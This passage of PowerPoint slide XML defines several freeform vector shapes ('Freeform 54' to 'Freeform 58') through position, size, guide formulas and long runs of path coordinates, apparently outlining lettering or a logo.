                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="367" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="399" y="347"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="425" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="425"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="646"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="677"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="719"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="751"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="745"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="735"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="714"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="714"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="682"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68" y="651"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="36" y="551"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="625"/>
                      </a:ln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9" name="Freeform 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5568950" y="6384925"/>
                  <a:ext cx="60325" cy="68263"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 168 w 169"/>
                    <a:gd name="T1" fmla="*/ 163 h 190"/>
                    <a:gd name="T2" fmla="*/ 37 w 169"/>
                    <a:gd name="T3" fmla="*/ 189 h 190"/>
                    <a:gd name="T4" fmla="*/ 0 w 169"/>
                    <a:gd name="T5" fmla="*/ 32 h 190"/>
                    <a:gd name="T6" fmla="*/ 137 w 169"/>
                    <a:gd name="T7" fmla="*/ 0 h 190"/>
                    <a:gd name="T8" fmla="*/ 168 w 169"/>
                    <a:gd name="T9" fmla="*/ 163 h 1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9" h="190">
                      <a:moveTo>
                        <a:pt x="168" y="163"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="37" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="163"/>
                      </a:ln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0" name="Freeform 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5692775" y="6080125"/>
                  <a:ext cx="307975" cy="328613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 210 w 857"/>
                    <a:gd name="T1" fmla="*/ 136 h 914"/>
                    <a:gd name="T2" fmla="*/ 478 w 857"/>
                    <a:gd name="T3" fmla="*/ 603 h 914"/>
                    <a:gd name="T4" fmla="*/ 478 w 857"/>
                    <a:gd name="T5" fmla="*/ 603 h 914"/>
                    <a:gd name="T6" fmla="*/ 415 w 857"/>
                    <a:gd name="T7" fmla="*/ 73 h 914"/>
                    <a:gd name="T8" fmla="*/ 625 w 857"/>
                    <a:gd name="T9" fmla="*/ 0 h 914"/>
                    <a:gd name="T10" fmla="*/ 856 w 857"/>
                    <a:gd name="T11" fmla="*/ 709 h 914"/>
                    <a:gd name="T12" fmla="*/ 725 w 857"/>
                    <a:gd name="T13" fmla="*/ 750 h 914"/>
                    <a:gd name="T14" fmla="*/ 541 w 857"/>
                    <a:gd name="T15" fmla="*/ 189 h 914"/>
                    <a:gd name="T16" fmla="*/ 541 w 857"/>
                    <a:gd name="T17" fmla="*/ 189 h 914"/>
                    <a:gd name="T18" fmla="*/ 599 w 857"/>
                    <a:gd name="T19" fmla="*/ 793 h 914"/>
                    <a:gd name="T20" fmla="*/ 488 w 857"/>
                    <a:gd name="T21" fmla="*/ 829 h 914"/>
                    <a:gd name="T22" fmla="*/ 179 w 857"/>
                    <a:gd name="T23" fmla="*/ 304 h 914"/>
                    <a:gd name="T24" fmla="*/ 179 w 857"/>
                    <a:gd name="T25" fmla="*/ 304 h 914"/>
                    <a:gd name="T26" fmla="*/ 363 w 857"/>
                    <a:gd name="T27" fmla="*/ 871 h 914"/>
                    <a:gd name="T28" fmla="*/ 231 w 857"/>
                    <a:gd name="T29" fmla="*/ 913 h 914"/>
                    <a:gd name="T30" fmla="*/ 0 w 857"/>
                    <a:gd name="T31" fmla="*/ 205 h 914"/>
                    <a:gd name="T32" fmla="*/ 210 w 857"/>
                    <a:gd name="T33" fmla="*/ 136 h 9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857" h="914">
                      <a:moveTo>
                        <a:pt x="210" y="136"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="856" y="709"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="725" y="750"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="599" y="793"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="871"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="913"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="136"/>
                      </a:ln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1" name="Freeform 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5986463" y="6086475"/>
                  <a:ext cx="203200" cy="222250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 21 w 563"/>
                    <a:gd name="T1" fmla="*/ 268 h 616"/>
                    <a:gd name="T2" fmla="*/ 0 w 563"/>
                    <a:gd name="T3" fmla="*/ 184 h 616"/>
                    <a:gd name="T4" fmla="*/ 5 w 563"/>
                    <a:gd name="T5" fmla="*/ 153 h 616"/>
                    <a:gd name="T6" fmla="*/ 16 w 563"/>
                    <a:gd name="T7" fmla="*/ 121 h 616"/>
                    <a:gd name="T8" fmla="*/ 63 w 563"/>
                    <a:gd name="T9" fmla="*/ 69 h 616"/>
                    <a:gd name="T10" fmla="*/ 95 w 563"/>
                    <a:gd name="T11" fmla="*/ 48 h 616"/>
                    <a:gd name="T12" fmla="*/ 132 w 563"/>
                    <a:gd name="T13" fmla="*/ 32 h 616"/>
                    <a:gd name="T14" fmla="*/ 231 w 563"/>
                    <a:gd name="T15" fmla="*/ 0 h 616"/>
                    <a:gd name="T16" fmla="*/ 268 w 563"/>
                    <a:gd name="T17" fmla="*/ 0 h 616"/>
                    <a:gd name="T18" fmla="*/ 299 w 563"/>
                    <a:gd name="T19" fmla="*/ 11 h 616"/>
                    <a:gd name="T20" fmla="*/ 352 w 563"/>
                    <a:gd name="T21" fmla="*/ 48 h 616"/>
                    <a:gd name="T22" fmla="*/ 368 w 563"/>
                    <a:gd name="T23" fmla="*/ 74 h 616"/>
                    <a:gd name="T24" fmla="*/ 499 w 563"/>
                    <a:gd name="T25" fmla="*/ 378 h 616"/>
                    <a:gd name="T26" fmla="*/ 530 w 563"/>
                    <a:gd name="T27" fmla="*/ 431 h 616"/>
                    <a:gd name="T28" fmla="*/ 562 w 563"/>
                    <a:gd name="T29" fmla="*/ 473 h 616"/>
                    <a:gd name="T30" fmla="*/ 436 w 563"/>
                    <a:gd name="T31" fmla="*/ 525 h 616"/>
                    <a:gd name="T32" fmla="*/ 415 w 563"/>
                    <a:gd name="T33" fmla="*/ 505 h 616"/>
                    <a:gd name="T34" fmla="*/ 394 w 563"/>
                    <a:gd name="T35" fmla="*/ 478 h 616"/>
                    <a:gd name="T36" fmla="*/ 383 w 563"/>
                    <a:gd name="T37" fmla="*/ 520 h 616"/>
                    <a:gd name="T38" fmla="*/ 363 w 563"/>
                    <a:gd name="T39" fmla="*/ 552 h 616"/>
                    <a:gd name="T40" fmla="*/ 331 w 563"/>
                    <a:gd name="T41" fmla="*/ 578 h 616"/>
                    <a:gd name="T42" fmla="*/ 289 w 563"/>
                    <a:gd name="T43" fmla="*/ 599 h 616"/>
                    <a:gd name="T44" fmla="*/ 226 w 563"/>
                    <a:gd name="T45" fmla="*/ 615 h 616"/>
                    <a:gd name="T46" fmla="*/ 199 w 563"/>
                    <a:gd name="T47" fmla="*/ 609 h 616"/>
                    <a:gd name="T48" fmla="*/ 173 w 563"/>
                    <a:gd name="T49" fmla="*/ 594 h 616"/>
                    <a:gd name="T50" fmla="*/ 132 w 563"/>
                    <a:gd name="T51" fmla="*/ 557 h 616"/>
                    <a:gd name="T52" fmla="*/ 116 w 563"/>
                    <a:gd name="T53" fmla="*/ 536 h 616"/>
                    <a:gd name="T54" fmla="*/ 105 w 563"/>
                    <a:gd name="T55" fmla="*/ 510 h 616"/>
                    <a:gd name="T56" fmla="*/ 84 w 563"/>
                    <a:gd name="T57" fmla="*/ 441 h 616"/>
                    <a:gd name="T58" fmla="*/ 84 w 563"/>
                    <a:gd name="T59" fmla="*/ 415 h 616"/>
                    <a:gd name="T60" fmla="*/ 89 w 563"/>
                    <a:gd name="T61" fmla="*/ 389 h 616"/>
                    <a:gd name="T62" fmla="*/ 116 w 563"/>
                    <a:gd name="T63" fmla="*/ 337 h 616"/>
                    <a:gd name="T64" fmla="*/ 137 w 563"/>
                    <a:gd name="T65" fmla="*/ 315 h 616"/>
                    <a:gd name="T66" fmla="*/ 231 w 563"/>
                    <a:gd name="T67" fmla="*/ 242 h 616"/>
                    <a:gd name="T68" fmla="*/ 252 w 563"/>
                    <a:gd name="T69" fmla="*/ 221 h 616"/>
                    <a:gd name="T70" fmla="*/ 263 w 563"/>
                    <a:gd name="T71" fmla="*/ 200 h 616"/>
                    <a:gd name="T72" fmla="*/ 257 w 563"/>
                    <a:gd name="T73" fmla="*/ 158 h 616"/>
                    <a:gd name="T74" fmla="*/ 242 w 563"/>
                    <a:gd name="T75" fmla="*/ 132 h 616"/>
                    <a:gd name="T76" fmla="*/ 221 w 563"/>
                    <a:gd name="T77" fmla="*/ 116 h 616"/>
                    <a:gd name="T78" fmla="*/ 199 w 563"/>
                    <a:gd name="T79" fmla="*/ 111 h 616"/>
                    <a:gd name="T80" fmla="*/ 168 w 563"/>
                    <a:gd name="T81" fmla="*/ 121 h 616"/>
                    <a:gd name="T82" fmla="*/ 137 w 563"/>
                    <a:gd name="T83" fmla="*/ 147 h 616"/>
                    <a:gd name="T84" fmla="*/ 132 w 563"/>
                    <a:gd name="T85" fmla="*/ 158 h 616"/>
                    <a:gd name="T86" fmla="*/ 137 w 563"/>
                    <a:gd name="T87" fmla="*/ 216 h 616"/>
                    <a:gd name="T88" fmla="*/ 26 w 563"/>
                    <a:gd name="T89" fmla="*/ 279 h 616"/>
                    <a:gd name="T90" fmla="*/ 284 w 563"/>
                    <a:gd name="T91" fmla="*/ 305 h 616"/>
                    <a:gd name="T92" fmla="*/ 263 w 563"/>
                    <a:gd name="T93" fmla="*/ 326 h 616"/>
                    <a:gd name="T94" fmla="*/ 231 w 563"/>
                    <a:gd name="T95" fmla="*/ 352 h 616"/>
                    <a:gd name="T96" fmla="*/ 216 w 563"/>
                    <a:gd name="T97" fmla="*/ 378 h 616"/>
                    <a:gd name="T98" fmla="*/ 226 w 563"/>
                    <a:gd name="T99" fmla="*/ 441 h 616"/>
                    <a:gd name="T100" fmla="*/ 236 w 563"/>
                    <a:gd name="T101" fmla="*/ 468 h 616"/>
                    <a:gd name="T102" fmla="*/ 257 w 563"/>
                    <a:gd name="T103" fmla="*/ 484 h 616"/>
                    <a:gd name="T104" fmla="*/ 279 w 563"/>
                    <a:gd name="T105" fmla="*/ 494 h 616"/>
                    <a:gd name="T106" fmla="*/ 305 w 563"/>
                    <a:gd name="T107" fmla="*/ 489 h 616"/>
                    <a:gd name="T108" fmla="*/ 331 w 563"/>
                    <a:gd name="T109" fmla="*/ 473 h 616"/>
                    <a:gd name="T110" fmla="*/ 352 w 563"/>
                    <a:gd name="T111" fmla="*/ 447 h 616"/>
                    <a:gd name="T112" fmla="*/ 357 w 563"/>
                    <a:gd name="T113" fmla="*/ 431 h 616"/>
                    <a:gd name="T114" fmla="*/ 357 w 563"/>
                    <a:gd name="T115" fmla="*/ 415 h 616"/>
                    <a:gd name="T116" fmla="*/ 352 w 563"/>
                    <a:gd name="T117" fmla="*/ 373 h 616"/>
                    <a:gd name="T118" fmla="*/ 310 w 563"/>
                    <a:gd name="T119" fmla="*/ 274 h 6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563" h="616">
                      <a:moveTo>
                        <a:pt x="21" y="268"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="153"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="90"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="63" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="63" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="74"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="505"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="505"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="609"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="615"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="615"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="609"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="594"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="594"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="100" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="337"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="337"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="289"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="216"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="279"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="268"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="284" y="305"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="284" y="305"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="447"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="447"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="284" y="30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2" name="Freeform 57"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6108700" y="5975350"/>
                  <a:ext cx="165100" cy="263525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 127 w 458"/>
                    <a:gd name="T1" fmla="*/ 0 h 731"/>
                    <a:gd name="T2" fmla="*/ 457 w 458"/>
                    <a:gd name="T3" fmla="*/ 661 h 731"/>
                    <a:gd name="T4" fmla="*/ 331 w 458"/>
                    <a:gd name="T5" fmla="*/ 730 h 731"/>
                    <a:gd name="T6" fmla="*/ 0 w 458"/>
                    <a:gd name="T7" fmla="*/ 62 h 731"/>
                    <a:gd name="T8" fmla="*/ 127 w 458"/>
                    <a:gd name="T9" fmla="*/ 0 h 7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8" h="731">
                      <a:moveTo>
                        <a:pt x="127" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="457" y="661"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="0"/>
                      </a:ln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3" name="Freeform 58"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6202363" y="5897563"/>
                  <a:ext cx="287337" cy="282575"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 126 w 799"/>
                    <a:gd name="T1" fmla="*/ 288 h 783"/>
                    <a:gd name="T2" fmla="*/ 383 w 799"/>
                    <a:gd name="T3" fmla="*/ 598 h 783"/>
                    <a:gd name="T4" fmla="*/ 383 w 799"/>
                    <a:gd name="T5" fmla="*/ 598 h 783"/>
                    <a:gd name="T6" fmla="*/ 241 w 799"/>
                    <a:gd name="T7" fmla="*/ 220 h 783"/>
                    <a:gd name="T8" fmla="*/ 378 w 799"/>
                    <a:gd name="T9" fmla="*/ 141 h 783"/>
                    <a:gd name="T10" fmla="*/ 640 w 799"/>
                    <a:gd name="T11" fmla="*/ 446 h 783"/>
                    <a:gd name="T12" fmla="*/ 646 w 799"/>
                    <a:gd name="T13" fmla="*/ 446 h 783"/>
                    <a:gd name="T14" fmla="*/ 504 w 799"/>
                    <a:gd name="T15" fmla="*/ 68 h 783"/>
                    <a:gd name="T16" fmla="*/ 619 w 799"/>
                    <a:gd name="T17" fmla="*/ 0 h 783"/>
                    <a:gd name="T18" fmla="*/ 798 w 799"/>
                    <a:gd name="T19" fmla="*/ 541 h 783"/>
                    <a:gd name="T20" fmla="*/ 656 w 799"/>
                    <a:gd name="T21" fmla="*/ 624 h 783"/>
                    <a:gd name="T22" fmla="*/ 394 w 799"/>
                    <a:gd name="T23" fmla="*/ 320 h 783"/>
                    <a:gd name="T24" fmla="*/ 388 w 799"/>
                    <a:gd name="T25" fmla="*/ 320 h 783"/>
                    <a:gd name="T26" fmla="*/ 530 w 799"/>
                    <a:gd name="T27" fmla="*/ 698 h 783"/>
                    <a:gd name="T28" fmla="*/ 388 w 799"/>
                    <a:gd name="T29" fmla="*/ 782 h 783"/>
                    <a:gd name="T30" fmla="*/ 0 w 799"/>
                    <a:gd name="T31" fmla="*/ 362 h 783"/>
                    <a:gd name="T32" fmla="*/ 126 w 799"/>
                    <a:gd name="T33" fmla="*/ 288 h 7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799" h="783">
                      <a:moveTo>
                        <a:pt x="126" y="288"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="598"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="598"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="141"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="646" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="798" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="624"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="698"/>
                      </a:lnTo>
